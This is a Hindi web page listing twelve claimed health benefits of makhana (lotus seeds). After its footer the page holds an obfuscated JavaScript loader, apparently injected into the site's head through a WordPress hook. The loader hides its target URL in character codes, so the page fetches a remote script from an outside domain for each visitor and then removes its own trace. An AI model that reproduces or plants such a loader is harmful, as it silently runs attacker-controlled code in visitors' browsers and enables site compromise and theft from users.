Saturday, July 13, 2024
spot_img

एक क्लिक में जानिए मखाने खाने के फायदे।

कमल के बीज, जिन्हें “मखाना” या “फॉक्स नट्स” के नाम से भी जाना जाता है, कमल के फूल (नेलुम्बो न्यूसीफेरा) के खाने योग्य बीज हैं। ये बीज सदियों से पारंपरिक एशियाई व्यंजनों और आयुर्वेदिक चिकित्सा का हिस्सा रहे हैं। वे कई प्रकार के स्वास्थ्य लाभ प्रदान करते हैं:



1. कैलोरी और वसा में कम: कमल के बीज एक कम कैलोरी वाला नाश्ता है और इसमें बहुत कम वसा होती है। यह उन्हें उन लोगों के लिए एक स्वस्थ विकल्प बनाता है जो अपना वजन नियंत्रित करना चाहते हैं।

2.पोषक तत्वों से भरपूर: कम कैलोरी सामग्री के बावजूद, कमल के बीज प्रोटीन, फाइबर, विटामिन (जैसे बी विटामिन), और खनिज (जैसे मैग्नीशियम, पोटेशियम और फास्फोरस) सहित आवश्यक पोषक तत्वों से भरे होते हैं। वे निरंतर ऊर्जा प्रदान करते हैं और मांसपेशियों और ऊतकों की मरम्मत में मदद करते हैं।

3. पाचन में सहायता: कमल के बीज में उच्च फाइबर सामग्री स्वस्थ पाचन को बढ़ावा देती है। यह नियमित मल त्याग को सुविधाजनक बनाकर कब्ज, सूजन और अन्य पाचन समस्याओं को रोकने में मदद करता है।

4. एंटीऑक्सीडेंट से भरपूर: कमल के बीज फ्लेवोनोइड्स सहित एंटीऑक्सीडेंट का एक अच्छा स्रोत हैं, जो शरीर में मुक्त कणों से लड़ने में मदद करते हैं। यह ऑक्सीडेटिव तनाव और सूजन को कम कर सकता है, संभावित रूप से पुरानी बीमारियों के खतरे को कम कर सकता है।

5. हृदय स्वास्थ्य: कमल के बीज में कम सोडियम और उच्च पोटेशियम सामग्री रक्तचाप को नियंत्रित करने में मदद कर सकती है। इसके अतिरिक्त, उनमें कम कोलेस्ट्रॉल और संतृप्त वसा की मात्रा उन्हें दिल के अनुकूल स्नैक्स बनाती है।

6. एंटी-इंफ्लेमेटरी: कमल के बीज में एंटी-इंफ्लेमेटरी गुण होते हैं, जो गठिया जैसी सूजन संबंधी स्थितियों के लक्षणों को कम करने में मदद कर सकते हैं।

7. नींद में सुधार:कमल के बीज में ट्रिप्टोफैन नामक अमीनो एसिड होता है, जो बेहतर नींद को बढ़ावा देने और अनिद्रा को कम करने के लिए जाना जाता है।

8. फॉस्फोरस से भरपूर: फास्फोरस स्वस्थ हड्डियों और दांतों के निर्माण के लिए आवश्यक है, और यह ऊर्जा चयापचय में भूमिका निभाता है। कमल के बीज इस खनिज का अच्छा स्रोत हैं।

9. गुर्दे के कार्य में सहायता: पारंपरिक चीनी और आयुर्वेदिक चिकित्सा में, कमल के बीज गुर्दे को लाभ पहुंचाने वाले माने जाते हैं। ऐसा माना जाता है कि वे किडनी के कार्य को मजबूत करने और किडनी से संबंधित बीमारियों के खतरे को कम करने में मदद करते हैं।

10.मधुमेह प्रबंधन: कमल के बीजों में ग्लाइसेमिक इंडेक्स कम होता है, जिसका अर्थ है कि उनका रक्त शर्करा के स्तर पर न्यूनतम प्रभाव पड़ता है। कम मात्रा में सेवन करने पर यह उन्हें मधुमेह वाले व्यक्तियों के लिए उपयुक्त बनाता है।

11.वजन घटाने में सहायता:कमल के बीज में फाइबर, प्रोटीन और कम कैलोरी सामग्री का संयोजन संतुलित आहार में शामिल होने पर भूख को नियंत्रित करने और वजन घटाने को बढ़ावा देने में मदद कर सकता है।

12. त्वचा स्वास्थ्य:कुछ पारंपरिक उपचार सुझाव देते हैं कि कमल के बीज का अर्क त्वचा के स्वास्थ्य में सुधार करने, संभावित रूप से मुँहासे को कम करने और अधिक युवा उपस्थिति को बढ़ावा देने में मदद कर सकता है।

यह ध्यान रखना महत्वपूर्ण है कि जबकि कमल के बीज कई स्वास्थ्य लाभ प्रदान करते हैं, इन्हें अक्सर संतुलित आहार के हिस्से के रूप में खाया जाता है और इसे पोषण का एकमात्र स्रोत नहीं माना जाना चाहिए। इसके अतिरिक्त, यदि आपके पास विशिष्ट आहार प्रतिबंध या स्वास्थ्य संबंधी चिंताएँ हैं, तो अपने आहार में महत्वपूर्ण परिवर्तन करने से पहले एक स्वास्थ्य देखभाल पेशेवर से परामर्श करना उचित है।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>